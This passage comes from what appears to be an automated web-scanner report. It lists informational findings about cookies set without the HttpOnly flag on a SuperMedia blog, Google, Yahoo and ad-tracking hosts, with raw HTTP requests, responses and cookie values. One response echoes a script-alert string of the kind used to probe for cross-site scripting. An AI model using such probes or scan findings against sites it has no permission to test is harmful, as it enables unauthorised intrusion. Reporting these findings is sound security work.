Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:30 GMT
Server: Unspecified
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:30 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Blog | SuperMedia.com</title>

<link rel="alternate" type="application/rss+xml"
...[SNIP]...

13.145. http://blog.supermedia.com/archives/news/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /archives/news/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /archives/news/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:31 GMT
Server: Unspecified
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:31 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Blog | SuperMedia.com</title>

<link rel="alternate" type="application/rss+xml"
...[SNIP]...

13.146. http://blog.supermedia.com/archives/newsletters/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /archives/newsletters/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /archives/newsletters/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:32 GMT
Server: Unspecified
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:32 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Blog | SuperMedia.com</title>

<link rel="alternate" type="application/rss+xml"
...[SNIP]...

13.147. http://blog.supermedia.com/archives/press-releases/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /archives/press-releases/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /archives/press-releases/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:33 GMT
Server: Unspecified
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:33 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Blog | SuperMedia.com</title>

<link rel="alternate" type="application/rss+xml"
...[SNIP]...

13.148. http://blog.supermedia.com/archives/tips/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /archives/tips/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /archives/tips/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:34 GMT
Server: Unspecified
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:34 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Blog | SuperMedia.com</title>

<link rel="alternate" type="application/rss+xml"
...[SNIP]...

13.149. http://blog.supermedia.com/comment_form.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /comment_form.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /comment_form.php HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:34 GMT
Server: Unspecified
Content-Length: 37
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:34 GMT;path=/

You+must+enter+a+valid+email+address.

13.150. http://blog.supermedia.com/comment_html.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /comment_html.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /comment_html.php HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:34 GMT
Server: Unspecified
Content-Length: 51
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:34 GMT;path=/

<script type="text/javascript">alert("");</script>

13.151. http://blog.supermedia.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: blog.supermedia.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296763697|check#true#1296761897; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:36:43 GMT
Server: Unspecified
Cteonnt-Length: 328
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:51:43 GMT;path=/
Cache-Control: private
Content-Length: 328

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /favicon.ico was not found on this server.</p>
<p>Add
...[SNIP]...

13.152. http://blog.supermedia.com/feed-icon-28x28.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /feed-icon-28x28.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /feed-icon-28x28.png HTTP/1.1
Host: blog.supermedia.com
Proxy-Connection: keep-alive
Referer: http://blog.supermedia.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_track=BP%3AUpdate%20Your%20Profile%20Top; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; mbox=session#1296759528614-838261#1296763697|check#true#1296761897

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:36:40 GMT
Server: Unspecified
Last-Modified: Fri, 23 Apr 2010 19:43:36 GMT
ETag: "53285-6c9-a4a0ea00"
Accept-Ranges: bytes
Content-Length: 1737
Content-Type: image/png
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:51:40 GMT;path=/

.PNG
.
...IHDR.............r......gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<...[IDATx..VY..E.....g..Y....{. ..dY.$....Jbx .>..D.^.....|UL|@b.@!1.....P. ......r....{...tw.....3KHtf..........
...[SNIP]...

13.153. http://blog.supermedia.com/feed/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /feed/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /feed/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:13 GMT
Server: Unspecified
Connection: close
Content-Type: text/xml
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:13 GMT;path=/

<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0"
                   xmlns:content="http://purl.org/rss/1.0/modules/content/"
                   xmlns:wfw="http://wellformedweb.org/CommentAPI/"
                >
<channel>
<titl
...[SNIP]...

13.154. http://blog.supermedia.com/feed/atom/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /feed/atom/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /feed/atom/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:13 GMT
Server: Unspecified
Connection: close
Content-Type: text/xml
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:13 GMT;path=/

<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
<title>SuperMedia Client Newsletter</title>
<link href="http://blog.supermedia.com/" ></link>
<id>urn:uuid:df704e63-b0
...[SNIP]...

13.155. http://blog.supermedia.com/main.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /main.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /main.css HTTP/1.1
Host: blog.supermedia.com
Proxy-Connection: keep-alive
Referer: http://blog.supermedia.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296763650|check#true#1296761850; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:36:38 GMT
Server: Unspecified
Last-Modified: Fri, 23 Apr 2010 15:59:59 GMT
ETag: "53286-43f-84e9bdc0"
Accept-Ranges: bytes
ntCoent-Length: 1087
Content-Type: text/css
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:51:38 GMT;path=/
Cache-Control: private
Content-Length: 1087

div#text_blog {
padding:25px;
}
div.blog_text {
padding:10px;
padding-bottom:20px;
margin-bottom:20px;
border-bottom:1px solid #ccc;
}
h2.post_title, h2.post_title a {
color:#006BB6 !i
...[SNIP]...

13.156. http://blogsearch.google.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogsearch.google.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: blogsearch.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:31:24 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=e5ba792587b9871d:TM=1296765084:LM=1296765084:S=8-JSBOXTuXRcLcm5; expires=Sat, 02-Feb-2013 20:31:24 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: bsfe
X-XSS-Protection: 1; mode=block
Connection: close

<html><head><meta HTTP-EQUIV="content-type" content="text/html; charset=UTF-8"><meta description="Google Blog Search provides fresh, relevant search results from millions of feed-enabled blogs. Users
...[SNIP]...

13.157. http://books.google.com/bkshp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://books.google.com
Path:   /bkshp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bkshp HTTP/1.1
Host: books.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:32:04 GMT
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=f09ac1e2ccf2b58a:TM=1296765124:LM=1296765124:S=VHIb6cqmET3q7qwK; expires=Sat, 02-Feb-2013 20:32:04 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: OFE/0.1
Connection: close

<!DOCTYPE html><html><head><script>(function(){function a(d){this.t={};this.tick=function(e,f,b){b=b?b:(new Date).getTime();this.t[e]=[b,f]};this.tick("start",null,d)}var c=new a;window.jstiming={Time
...[SNIP]...

13.158. http://books.google.com/books  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://books.google.com
Path:   /books

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /books HTTP/1.1
Host: books.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:31:57 GMT
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=6552b75bb12891c4:TM=1296765117:LM=1296765117:S=z2Yh1vRAeMtxN6LI; expires=Sat, 02-Feb-2013 20:31:57 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: OFE/0.1
Connection: close

<!DOCTYPE html><html><head><script>(function(){function a(d){this.t={};this.tick=function(e,f,b){b=b?b:(new Date).getTime();this.t[e]=[b,f]};this.tick("start",null,d)}var c=new a;window.jstiming={Time
...[SNIP]...

13.159. http://bp.specificclick.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bp.specificclick.net
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?pixid=99004680 HTTP/1.1
Host: bp.specificclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adp=7CUZ^0^8191; smdmp=7BUF:99061898^780z:1215201001^780z:201201001^780z:1012200938^780z:1011201009^77xf:99004015^77xe:99001525^77x6:99011769^75W4:99002797^75W4:99004740^74ry:104201102^74ry:811200901^74Xd:99063500; adf=7CUZ^0^0; ug=uosDj9Liw_xRTA

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-store,no-cache,must-revalidate
Cache-Control: post-check=0,pre-check=0
Pragma: no-cache
p3p: policyref="http://www.specificmedia.com/w3c/p3p.xml", CP="NON DSP COR ADM DEV PSA PSD IVA OUT BUS STA"
Set-Cookie: adp=7CUZ^0^8191; Domain=.specificclick.net; Expires=Fri, 03-Feb-2012 19:03:59 GMT; Path=/
Set-Cookie: ug=uosDj9Liw_xRTA; Domain=.specificclick.net; Expires=Fri, 03-Feb-2012 19:03:59 GMT; Path=/
Set-Cookie: smdmp=7CVs:99004680^7BUF:99061898^780z:1215201001^780z:201201001^780z:1012200938^780z:1011201009^77xf:99004015^77xe:99001525^77x6:99011769^75W4:99002797^75W4:99004740^74ry:104201102^74ry:811200901^74Xd:99063500; Domain=.specificclick.net; Expires=Fri, 03-Feb-2012 19:03:59 GMT; Path=/
Set-Cookie: adf=7CUZ^0^0; Domain=.specificclick.net; Expires=Fri, 03-Feb-2012 19:03:59 GMT; Path=/
p3p: policyref="http://www.specificmedia.com/w3c/p3p.xml", CP="NON DSP COR ADM DEV PSA PSD IVA OUT BUS STA"
Set-Cookie: ug=uosDj9Liw_xRTA; Domain=.specificclick.net; Expires=Fri, 03-Feb-2012 19:03:59 GMT; Path=/
p3p: policyref="http://www.specificmedia.com/w3c/p3p.xml", CP="NON DSP COR ADM DEV PSA PSD IVA OUT BUS STA"
Set-Cookie: nug=; Domain=.specificclick.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Location: http://www.googleadservices.com/pagead/conversion/1030885431/?label=z3WgCNenmAIQt6DI6wM&amp;guid=ON&amp;script=0
Content-Type: text/html
Content-Length: 0
Date: Thu, 03 Feb 2011 19:03:58 GMT


13.160. http://buzz.yahoo.com/buzz  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://buzz.yahoo.com
Path:   /buzz

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /buzz HTTP/1.1
Host: buzz.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 19:35:40 GMT
Set-Cookie: B=fjoviv16km0sc&b=3&s=eo; expires=Tue, 03-Feb-2013 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: of01e2=08556806c2aa36978721cfcb146d3d49; path=/; domain=buzz.yahoo.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, private
Pragma: no-cache
Location: http://login.yahoo.com/?.pd=c%3DhYw09vWp2e4FXlpTB9bd0rU-&.src=ybz&.intl=us&.done=http%3A%2F%2Fbuzz.yahoo.com%2Fvote%2F
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 83

<!-- fe13.buzz.re1.yahoo.com uncompressed/chunked Thu Feb 3 11:35:40 PST 2011 -->

13.161. http://c.redcated/c.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.redcated
Path:   /c.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /c.gif?jsv=3525&jsa=view&pi=7317&ps=95101&di=340&tp=http%3A%2F%2Fwww.msn.com%2Fdefaultwpe7.aspx&lng=en-us&tz=-6&scr=1920x1200x16&rid=89026872c5cc408f95bb663ec7f2d02f&udc=true&rnd=1296786631905&RedC=c.msn.com&MXFR=AD04D6F8B2FF44629973BD0674351135 HTTP/1.1
Accept: */*
Referer: http://www.msn.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: c.redcated
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Redirect
Cache-Control: private, no-cache, proxy-revalidate
Pragma: no-cache
Location: http://c.msn.com/c.gif?jsv=3525&jsa=view&pi=7317&ps=95101&di=340&tp=http%3A%2F%2Fwww.msn.com%2Fdefaultwpe7.aspx&lng=en-us&tz=-6&scr=1920x1200x16&rid=89026872c5cc408f95bb663ec7f2d02f&udc=true&rnd=1296786631905&MUID=AD04D6F8B2FF44629973BD0674351135
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Set-Cookie: MUID=AD04D6F8B2FF44629973BD0674351135; domain=.redcated; expires=Tue, 23-Aug-2011 02:29:39 GMT; path=/;
Date: Fri, 04 Feb 2011 02:29:38 GMT
Content-Length: 0


13.162. http://clk.redcated/AVE/go/285974183/direct  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.redcated
Path:   /AVE/go/285974183/direct

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AVE/go/285974183/direct HTTP/1.1
Host: clk.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.hollandamerica.com/find-cruise-vacation/OnlineAdOffers.action?specialOfferType=onad_28&WT.mc_id=Partner_ScanScout_US_PreRollCompanion
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001296770644-3981256; expires=Saturday, 02-Feb-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: MUID=5F36AEF5D4FB49DB9F81F864E31B34FC; expires=Monday, 22-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach00=af02/243a7; expires=Saturday, 02-Feb-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach01=c003d4d/243a7/110b9ea7/af02/4d4b2654; expires=Saturday, 02-Feb-2013 00:00:00 GMT; path=/; domain=.redcated
Connection: close
Date: Thu, 03 Feb 2011 22:04:03 GMT
Connection: close


13.163. http://clk.redcated/AVE/go/286182932/direct/01/]]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.redcated
Path:   /AVE/go/286182932/direct/01/]]

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AVE/go/286182932/direct/01/]] HTTP/1.1
Host: clk.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.hollandamerica.com/find-cruise-vacation/OnlineAdOffers.action?specialOfferType=onad_28&WT.mc_id=Partner_ScanScout_US_WonderPreRoll
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001296770649-3995471; expires=Saturday, 02-Feb-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: MUID=8EE4F442F1FB4932AD6D6003B4E01B9A; expires=Monday, 22-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach00=af02/243a7; expires=Saturday, 02-Feb-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach01=bcab411/243a7/110ece14/af02/4d4b2659; expires=Saturday, 02-Feb-2013 00:00:00 GMT; path=/; domain=.redcated
Connection: close
Date: Thu, 03 Feb 2011 22:04:08 GMT
Connection: close


13.164. http://code.google.com/p/simplemodal/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://code.google.com
Path:   /p/simplemodal/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p/simplemodal/ HTTP/1.1
